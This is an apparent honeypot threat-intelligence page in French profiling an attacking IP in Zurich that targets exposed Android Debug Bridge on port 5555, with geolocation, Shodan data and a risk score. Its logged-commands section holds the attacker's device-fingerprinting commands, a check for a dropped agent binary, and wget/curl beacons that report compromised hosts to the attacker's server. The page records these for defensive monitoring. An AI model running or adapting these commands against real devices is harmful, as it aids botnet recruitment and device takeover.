TROYANOSYVIRUS
Menace ActiveFAIBLE

31.7.58.138

Pays d'Origine🇨🇭 CH
Premiere Detection19/04/2026
Derniere Activite21/04/2026
FAIPrivate Layer INC
🎯
100
Attaques Totales
🔌
1
Ports
📡
1
Types d'Attaque
🦠
0
Malware

Geolocalisation

Pays
🇨🇭 CH
Ville
Zurich
ASN
AS51852
FAI
Private Layer INC

Types d'Attaque

adb_honeypot

Ports Attaques

5555

Malware Associe

Aucun malware associe

Commandes Executees

$uname -m14x
$getprop ro.product.cpu.abi14x
$echo "===IDENT===" id 2>/dev/null hostname 2>/dev/null echo "===PROPS===" for k in ro.product.cpu.abi ro.product.cpu.abilist ro.product.cpu.abilist64 ro.product.cpu.abilist32 ro.product.model ro.product.manufacturer ro.product.brand ro.product.device ro.product.board ro.build.version.release ro.build.version.sdk ro.build.version.security_patch ro.build.fingerprint ro.build.type ro.hardware ro.boot.hardware ro.serialno; do V=$(getprop $k 2>/dev/null) [ -n "$V" ] && echo "$k=$V" done echo "===6x
$grep -E '^(CPU architecture|Processor|model name)' /proc/cpuinfo 2>/dev/null | head -34x
$ls /system/lib64/libc.so 2>/dev/null && echo L64 || echo L324x
$wc -c < /data/local/tmp/barco-agent-arm64 2>/dev/null2x
$wget -qO- 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null; echo __rc=$?1x
$wget -qO- 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null; echo __rc=$?1x

Exposition Shodan InternetDBShodan

Donnees InternetDB, pas en temps reel

Ports
80443300030015432808190909999
Hostnames
moonbet.unowww.wired4.infontp.digitalsuisse.comwired4.info
CPEs
cpe:/a:f5:nginxcpe:/a:postgresql:postgresql

Evaluation des Risques

30
/100
FaibleMoyenEleveCritique